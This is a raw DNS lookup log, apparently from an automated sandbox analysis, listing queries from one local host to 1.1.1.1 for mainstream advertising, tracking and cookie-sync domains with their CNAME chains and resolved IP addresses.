                                                                                                                                                                                                        Aug 15, 2024 15:38:34.892219067 CEST1.1.1.1192.168.2.40x1e0dNo error (0)pbs.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.892219067 CEST1.1.1.1192.168.2.40x1e0dNo error (0)edge.gycpi.b.yahoodns.net87.248.119.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.892219067 CEST1.1.1.1192.168.2.40x1e0dNo error (0)edge.gycpi.b.yahoodns.net87.248.119.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:34.892249107 CEST1.1.1.1192.168.2.40xbc6No error (0)pbs.yahoo.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:35.071203947 CEST1.1.1.1192.168.2.40xbd72No error (0)lm.serving-sys.comlm.eyeblaster.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:35.071203947 CEST1.1.1.1192.168.2.40xbd72No error (0)aka-lm-fr.ads.sizmdx.comadserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:35.071203947 CEST1.1.1.1192.168.2.40xbd72No error (0)adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.com18.196.77.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:35.071203947 CEST1.1.1.1192.168.2.40xbd72No error (0)adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.com3.77.62.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:35.071203947 CEST1.1.1.1192.168.2.40xbd72No error (0)adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.com52.28.91.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:35.071311951 CEST1.1.1.1192.168.2.40x6764No error (0)lm.serving-sys.comlm.eyeblaster.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:35.071311951 CEST1.1.1.1192.168.2.40x6764No error (0)aka-lm-fr.ads.sizmdx.comadserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.103230000 CEST1.1.1.1192.168.2.40xeb19No error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.103230000 CEST1.1.1.1192.168.2.40xeb19No error (0)tagr-pixel-nginx-odr-euw4.mookie1.com34.160.236.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.103341103 CEST1.1.1.1192.168.2.40xb7faNo error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.477369070 CEST1.1.1.1192.168.2.40x5f3eNo error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.478200912 CEST1.1.1.1192.168.2.40x2613No error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.478728056 CEST1.1.1.1192.168.2.40x3d09Name error (3)amazon.partners.tremorhub.comnonenone65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.479001045 CEST1.1.1.1192.168.2.40xaaa8Name error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.479548931 CEST1.1.1.1192.168.2.40x6405No error (0)public-prod-dspcookiematching.dmxleo.com188.65.124.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.488976002 CEST1.1.1.1192.168.2.40x2267Name error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.497925043 CEST1.1.1.1192.168.2.40x2f3aNo error (0)ads.stickyadstv.comip1.ads.stickyadstv.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.498182058 CEST1.1.1.1192.168.2.40x8d16No error (0)ads.stickyadstv.comip1.ads.stickyadstv.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:36.714024067 CEST1.1.1.1192.168.2.40x795fNo error (0)sync.rfp.fout.jp35.186.196.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.175908089 CEST1.1.1.1192.168.2.40xdc7aNo error (0)us-u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.175908089 CEST1.1.1.1192.168.2.40xdc7aNo error (0)us-u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.178735018 CEST1.1.1.1192.168.2.40x796No error (0)ssum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.178735018 CEST1.1.1.1192.168.2.40x796No error (0)ssum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.178982019 CEST1.1.1.1192.168.2.40xfe52No error (0)ssum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.180068970 CEST1.1.1.1192.168.2.40xe573No error (0)uipglob.semasio.netuipglob.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.180068970 CEST1.1.1.1192.168.2.40xe573No error (0)uip.semasio.net77.243.51.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.180068970 CEST1.1.1.1192.168.2.40xe573No error (0)uip.semasio.net77.243.51.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.180695057 CEST1.1.1.1192.168.2.40x1353No error (0)uipglob.semasio.netuipglob.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.182647943 CEST1.1.1.1192.168.2.40x3f20Name error (3)amazon.partners.tremorhub.comnonenone65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.184365988 CEST1.1.1.1192.168.2.40x8186Name error (3)beacon.krxd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.184609890 CEST1.1.1.1192.168.2.40x9ab6Name error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.185853004 CEST1.1.1.1192.168.2.40xcc30Name error (3)beacon.krxd.netnonenone65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.223118067 CEST1.1.1.1192.168.2.40xfcdfName error (3)beacon.krxd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.237051964 CEST1.1.1.1192.168.2.40x3f9bNo error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.237051964 CEST1.1.1.1192.168.2.40x3f9bNo error (0)user-data-eu.bidswitch.net35.214.149.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.237570047 CEST1.1.1.1192.168.2.40xeb42No error (0)x.bidswitch.netuser-data-eu.bidswitch.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.409574032 CEST1.1.1.1192.168.2.40xb386No error (0)match.sharethrough.commatch-eu-central-1-ecs.sharethrough.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.409574032 CEST1.1.1.1192.168.2.40xb386No error (0)match-eu-central-1-ecs.sharethrough.com18.197.30.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.410285950 CEST1.1.1.1192.168.2.40x247aNo error (0)match.sharethrough.commatch-eu-central-1-ecs.sharethrough.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.473066092 CEST1.1.1.1192.168.2.40x2af5No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.473083019 CEST1.1.1.1192.168.2.40x78d3No error (0)pixel.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.492084980 CEST1.1.1.1192.168.2.40xee55No error (0)s.amazon-adsystem.com52.46.151.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.505899906 CEST1.1.1.1192.168.2.40x3befNo error (0)rtb-csync.smartadserver.comrtb-csync-geo.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync.smartadserver.comrtb-csync-geo.usersync-prod-sas.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com81.17.55.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com89.149.193.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com89.149.193.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com89.149.192.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com89.149.192.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com89.149.193.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com81.17.55.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com81.17.55.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com81.17.55.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com89.149.193.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com81.17.55.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com89.149.193.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com89.149.192.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com89.149.193.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com89.149.192.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.506087065 CEST1.1.1.1192.168.2.40x2177No error (0)rtb-csync-euw1.smartadserver.com81.17.55.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.510174036 CEST1.1.1.1192.168.2.40x5f20No error (0)aax-eu.amazon-adsystem.com67.220.228.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.631340981 CEST1.1.1.1192.168.2.40xffd9No error (0)loadus.exelator.comloadus.tm.ssl.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.631340981 CEST1.1.1.1192.168.2.40xffd9No error (0)loadus.tm.ssl.exelator.comeu-west.load.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.631340981 CEST1.1.1.1192.168.2.40xffd9No error (0)eu-west.load.exelator.comload-euw1.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.631340981 CEST1.1.1.1192.168.2.40xffd9No error (0)load-euw1.exelator.com34.254.143.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.631800890 CEST1.1.1.1192.168.2.40x49eNo error (0)loadus.exelator.comloadus.tm.ssl.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.631800890 CEST1.1.1.1192.168.2.40x49eNo error (0)loadus.tm.ssl.exelator.comeu-west.load.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.631800890 CEST1.1.1.1192.168.2.40x49eNo error (0)eu-west.load.exelator.comload-euw1.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:37.979432106 CEST1.1.1.1192.168.2.40x6438No error (0)public-prod-dspcookiematching.dmxleo.com188.65.124.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.085423946 CEST1.1.1.1192.168.2.40x416No error (0)sync.rfp.fout.jp35.186.196.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.118592978 CEST1.1.1.1192.168.2.40xe50No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.118592978 CEST1.1.1.1192.168.2.40xe50No error (0)star-mini.c10r.facebook.com157.240.0.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.119914055 CEST1.1.1.1192.168.2.40x5c16No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.119914055 CEST1.1.1.1192.168.2.40x5c16No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.119914055 CEST1.1.1.1192.168.2.40x5c16No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.119914055 CEST1.1.1.1192.168.2.40x5c16No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.214.73.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.119914055 CEST1.1.1.1192.168.2.40x5c16No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com63.34.151.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.119914055 CEST1.1.1.1192.168.2.40x5c16No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.248.194.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.119914055 CEST1.1.1.1192.168.2.40x5c16No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.78.109.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.119914055 CEST1.1.1.1192.168.2.40x5c16No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.250.191.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.119914055 CEST1.1.1.1192.168.2.40x5c16No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com63.34.48.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.119914055 CEST1.1.1.1192.168.2.40x5c16No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.171.135.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.119914055 CEST1.1.1.1192.168.2.40x5c16No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.254.85.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.120579004 CEST1.1.1.1192.168.2.40x8ae9No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.120600939 CEST1.1.1.1192.168.2.40x9ae1No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.120600939 CEST1.1.1.1192.168.2.40x9ae1No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.120600939 CEST1.1.1.1192.168.2.40x9ae1No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.330184937 CEST1.1.1.1192.168.2.40x4655No error (0)uipus.semasio.net50.57.31.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.591219902 CEST1.1.1.1192.168.2.40xe276No error (0)s.amazon-adsystem.com52.46.151.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.713762045 CEST1.1.1.1192.168.2.40x2b62No error (0)sync.sxp.smartclip.net35.186.194.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.839435101 CEST1.1.1.1192.168.2.40x61f0No error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.839435101 CEST1.1.1.1192.168.2.40x61f0No error (0)image6v2.pubmnet.compugm-sin12.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.839435101 CEST1.1.1.1192.168.2.40x61f0No error (0)pugm-sin12.pubmnet.com207.65.33.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.839497089 CEST1.1.1.1192.168.2.40x25c8No error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.839497089 CEST1.1.1.1192.168.2.40x25c8No error (0)image6v2.pubmnet.compugm-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.986520052 CEST1.1.1.1192.168.2.40x6e04Name error (3)usermatch.krxd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.987514019 CEST1.1.1.1192.168.2.40x8ca6Name error (3)usermatch.krxd.netnonenone65IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:38.996431112 CEST1.1.1.1192.168.2.40x69d4Name error (3)usermatch.krxd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.004822016 CEST1.1.1.1192.168.2.40x6d0bNo error (0)csync.loopme.meenvoy-hl.envoy-csync1.core-b8mf.ov1o.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.004822016 CEST1.1.1.1192.168.2.40x6d0bNo error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.128.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.004822016 CEST1.1.1.1192.168.2.40x6d0bNo error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.169.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.004822016 CEST1.1.1.1192.168.2.40x6d0bNo error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.177.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.004822016 CEST1.1.1.1192.168.2.40x6d0bNo error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.230.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.004822016 CEST1.1.1.1192.168.2.40x6d0bNo error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.252.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.004822016 CEST1.1.1.1192.168.2.40x6d0bNo error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.247.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.004822016 CEST1.1.1.1192.168.2.40x6d0bNo error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.136.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.004822016 CEST1.1.1.1192.168.2.40x6d0bNo error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.211.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.004822016 CEST1.1.1.1192.168.2.40x6d0bNo error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.246.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.004822016 CEST1.1.1.1192.168.2.40x6d0bNo error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.220.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.005204916 CEST1.1.1.1192.168.2.40x9e83No error (0)csync.loopme.meenvoy-hl.envoy-csync1.core-b8mf.ov1o.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.982105970 CEST1.1.1.1192.168.2.40xcd28No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.982105970 CEST1.1.1.1192.168.2.40xcd28No error (0)eu-eb2.3lift.com13.248.245.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.982105970 CEST1.1.1.1192.168.2.40xcd28No error (0)eu-eb2.3lift.com76.223.111.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:39.982472897 CEST1.1.1.1192.168.2.40x2250No error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.210103035 CEST1.1.1.1192.168.2.40x768No error (0)crb.kargo.com3.126.77.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.210103035 CEST1.1.1.1192.168.2.40x768No error (0)crb.kargo.com18.197.94.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.210103035 CEST1.1.1.1192.168.2.40x768No error (0)crb.kargo.com35.156.51.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.235133886 CEST1.1.1.1192.168.2.40x4acfNo error (0)www.amazon.detp.abe2c2f23-frontier.amazon.deCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.235133886 CEST1.1.1.1192.168.2.40x4acfNo error (0)tp.abe2c2f23-frontier.amazon.dedjvbdz1obemzo.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.235133886 CEST1.1.1.1192.168.2.40x4acfNo error (0)djvbdz1obemzo.cloudfront.net52.222.239.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.236001015 CEST1.1.1.1192.168.2.40xc4c3No error (0)www.amazon.detp.abe2c2f23-frontier.amazon.deCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.236001015 CEST1.1.1.1192.168.2.40xc4c3No error (0)tp.abe2c2f23-frontier.amazon.dedjvbdz1obemzo.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.650235891 CEST1.1.1.1192.168.2.40x47f6No error (0)usersync.gumgum.com34.247.233.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.650235891 CEST1.1.1.1192.168.2.40x47f6No error (0)usersync.gumgum.com34.247.205.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:40.650235891 CEST1.1.1.1192.168.2.40x47f6No error (0)usersync.gumgum.com52.210.15.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:41.095628977 CEST1.1.1.1192.168.2.40x9a31No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:41.095628977 CEST1.1.1.1192.168.2.40x9a31No error (0)image2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:41.095942974 CEST1.1.1.1192.168.2.40xb388No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:41.095942974 CEST1.1.1.1192.168.2.40xb388No error (0)image2v2.pubmnet.compug-ams-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:41.095942974 CEST1.1.1.1192.168.2.40xb388No error (0)pug-ams-bc.pubmnet.com198.47.127.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:43.303129911 CEST1.1.1.1192.168.2.40xc386No error (0)crb.kargo.com18.197.94.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:43.303129911 CEST1.1.1.1192.168.2.40xc386No error (0)crb.kargo.com35.156.51.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:43.303129911 CEST1.1.1.1192.168.2.40xc386No error (0)crb.kargo.com3.126.77.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.043337107 CEST1.1.1.1192.168.2.40x9b0cNo error (0)www.amazon.detp.abe2c2f23-frontier.amazon.deCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.043337107 CEST1.1.1.1192.168.2.40x9b0cNo error (0)tp.abe2c2f23-frontier.amazon.dewww-amazon-de.customer.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.043337107 CEST1.1.1.1192.168.2.40x9b0cNo error (0)www-amazon-de.customer.fastly.net162.219.224.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.045305014 CEST1.1.1.1192.168.2.40x972fNo error (0)www.amazon.detp.abe2c2f23-frontier.amazon.deCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.045305014 CEST1.1.1.1192.168.2.40x972fNo error (0)tp.abe2c2f23-frontier.amazon.dewww.amazon.de.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.249187946 CEST1.1.1.1192.168.2.40xdcecNo error (0)sync-amazon.ads.yieldmo.comsync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                        Aug 15, 2024 15:38:44.249187946 CEST1.1.1.1192.168.2.40xdcecNo error (0)sync.ads.yieldmo.comeu-west-1-sync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
